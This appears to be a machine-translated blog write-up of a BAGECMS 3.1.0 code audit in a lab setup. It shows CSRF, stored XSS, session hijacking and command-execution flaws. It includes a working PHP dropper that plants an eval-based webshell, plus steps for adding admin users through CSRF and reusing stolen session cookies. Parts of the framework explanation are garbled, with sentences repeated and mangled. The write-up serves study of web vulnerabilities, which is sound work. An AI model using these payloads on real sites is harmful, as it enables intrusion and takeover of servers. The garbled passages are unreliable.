prefaceThis content carries out a code audit and vulnerability repetition for BAGECMS in THE CNVD general vulnerability database, and carries out replication mining for several vulnerabilities in the CNVD vulnerability database, and finds several new vulnerability points. This experiment is a target aircraft environment. This content is only for study and research, not for illegal ways.A, environmentalhttp://61.155.169.167:81/uploads/userup/1870/bagecms.zipOn the downloadbagecmsSource code, put it downphpstudyUnder the software, you can set up a Web environment, and then import. SQL database backup files to the local database manager. Automatic installation environment, accesshttp://xxx.com/bagecms3.1.0/upload//index.php?r=install“And click Next.

After configuring database information, including the server name, database name, database user, and database password, the installation succeeds

2021 Latest collation of Network security penetration testing/security learning materials (full set of videos, dACHang face book, boutique manual. Essential kit)

Second, CMS framework auditBelow is the downloaded source file, mainly under the upload folderindex.php

Look at theindex.phpBecause the path structure of the site is/upload/index.php? r=xxx

$f ramework = dirname(__FILE__) . '/f ramework/yiilite.php';
$config = dirname(__FILE__) . '/protected/config/main.php';
define('WWWPATH', str_replace(array('\\', '\\\\'), '/', dirname(__FILE__)));
define('DS', DIRECTORY_SEPARATOR);
require_once ($f ramework);
Yii::createWebApplication($config)->run();
Copy the code

1. The framework for storing the current file name and the absolute path/framework/yiilite php2. The f ramework for storing the current filename and absolute path/f ramework/yiilite PHP 2. The framework for storing the current file name and the absolute path/framework/yiilite php2. Config for storing the current filename and absolute path/protected/config/main PHP 3. Define (‘ WWWPATH ‘, Str_replace (array(”, ‘\’), ‘/’, dirName (FILE))) get the root directory of the website 4. Define (‘DS’, DIRECTORY_SEPARATOR); Define the directory separator 5. Require_once (framework) in the index. A PHP script during execution contains a specified file and run the yiilite. V6. Yii: : createWebApplication (f Ramework) contains and runs the specified file yiilite.php during the execution of the index.php script 6. Yii: : createWebApplication (framework) in the index. A PHP script during execution contains a specified file and run the yiilite. V6. Yii: : createWebApplication (config) – > run (); The Yii framework starts the webApplication object

Look at theyiilite.phpIn theindex.phpContains the file in

Yiilite.php packs commonly used classes together, reducing calls to include 2. Trace () calls and comments in this code have been removed. 3.yiilite.php reduces the number of files referenced and avoids trace statements

Analyze main.php, Yii framework called the file when the object is started to define a number of arrays to store data, such as GII module store password and host IP address, DB module store database information, mainly introduced to urlManager module

'urlManager'=>array(
 //'urlFormat'=>'path',
 'showS criptName'=>true,
 //'urlSuffix'=>'.html',
 'rules'=>array(
 'post/<id:\d+>/*'=>'post/show',
 'post/<id:\d+>_<title:\w+>/*'=>'post/show',
 'post/catalog/<catalog:[\w-_]+>/*'=>'post/index',
 'page/show/<name:\w+>/*'=>'page/show',
 'special/show/<name:[\w-_]+>/*'=>'special/show',
 '<controller:\w+>/<action:\w+>'=>'<controller>/<action>',
 )
Copy the code


// this refers to the matching controller.

// this refers to the matching method in the controller.< PID :\d+>// here refers to obtain the corresponding request parameters key
\w+>
\w+>

CSRF cross-site request forgery attack CSRF attack mechanismWhen you log on to a normal website, the browser records your cookie information, and an attacker steals your identity and sends a malicious request in your name (which is legal to the server), accomplishing what the attacker wants.

1. A normal user or administrator opens a browser, accesses a trusted website, and enters the user name and password to log in to the website. The website sends the cookie information back to the browser. Normal users can send normal requests to the website

2. The attacker constructs the web page containing the offensive code, and the manufacturing process of the web page is as follows (1) In the add user module of the website, select add user, and input the parameters of add user to submit, and then useburpsuiteCapture the request packet. The request packet will carry the accessed POST request data information.Right click --> Related Tools -->CSRF POC generation, can be successful CSRF POC

(2) copy down its POC (HTML code format), create a new HTML text, and then copy in, if it is in the real environment can be through QQ, email, personal VPS and other ways, let the user click on the HTML text, you can perform the operation of adding users. (3) Analysis of POC structure,< form action = "http:// IP/bagecms3.1.0 / upload/index. The PHP? r=admini/admin/create" method="POST">, visit the normal website, and submit the hidden request data through submit. Here, my value parameter value is 1

3. Before the user exits the website, open a webpage in the same browser to visit the website made by CSRF POC (it can be modified here to let the user have the idea of clicking this page). After clicking, the website will think it is the normal request of the user and add a user

4. After receiving these offensive codes, according to the request of THE CSRF POC website, the browser carries Cookie information without the user’s knowledge and sends a request to the normal website. Normal websites do not know that the request is actually initiated by the CSRF POC website, so they will process the request with the user’s permission according to the user’s Cookie information, resulting in the malicious code from the CSRF POC website being executed.

XSS cross-site scripting attacksThe attack exists in the background site setting module, and the function of popover can be realized by constructing XSS script attack

Because the content of background site Settings will be displayed on the page, so the location of the pop-up window will also be viewed on the front page

Code analysis, global search to footer.php file, found that contact us module code is
a lert(111) and echo this statement when executed by footer.php

<p class="home"><? php echo $this->_conf['_address']? ></p> <p class="telephone"><? php echo $this->_conf['_telephone']? ></p> <p class="telephone"><? php echo $this->_conf['_fax']? ></p> <p class="mobile"><? php echo $this->_conf['_mobile']? ></p> <p class="email"><? php echo $this->_conf['admin_email']? ></p>Copy the code

Storage XSS executes successfully, because the site is set to POST data to the database, so every time you visit the home page, there will be a popup window.

5. Session hijacking attacks Principles of session hijacking attacksRegular users will distribute one when they visit the sitesessionAnd then the attacker somehow gets the user’ssession, by modifying its ownsessionTo access the data of normal users.

1. The target user logs in to the website. After the login succeeds, the user is granted a sessionseesionTo keep the conversation going

2. The attacker obtains it through some meanssession(XSS, brute force cracking, enumerating sessions, phishing, etc), and then modify the request packet, you can carry on the session hijacking of the websiteCookie: PHPSESSID=v7iomrvcfjq6uhnjduv8h6dit3

3. When an attacker gains a sessionsessionAfter, you can operate the website background without logging in (thesessionLeave unchanged) delete files arbitrarily in an unlogged browser for testing, at this time captured packet acquisitionsessionA value ofCookie: PHPSESSID=qtc31bohagca38o88kuife81j6

If you delete files from the website without logging in, the following information is displayed before the deletion

Change packets captured without logincookieThe value ofCookie: PHPSESSID=v7iomrvcfjq6uhnjduv8h6dit3And then request the packet for deleting the contents of the file, click Send Packet

Any file is successfully deleted. The following command output is displayed

6. Command execution vulnerabilityThe code configuration modified by the website module does not filter and detect the content of the file, which leads to the direct parsing and execution of malicious code when it is added

In the background site site module stored under the site configuration file, whichquestion/index.phpSave is the message board configuration file, inquestion/index.phpAdd malicious code at the end, a word Trojan stored in the filesu.phpIs created if it does not existsu.php <? php file_put_contents("su.php","<? php @e val(\$_POST[cmd]); ? > "); ? >

Access path http://xxx.com/bagecms3.1.0/upload/index.php?r=question/index, make the code executed, the Trojan horse su. PHP

Accessing Trojan Filessu.phpAnd then throughA post requestSubmit parameter code to get data

Access the Trojan through the ant sword toolwebshell

To sum up, in the process of code audit and reoccurrence, the first step is to look at the CNVD vulnerability database to see what vulnerabilities exist, and then visit the possible vulnerability points to try to mine. Finally, the above vulnerability points are mined, and the mining thinking process is attached. This article is only for study and research, not illegal operation. [Data Acquisition]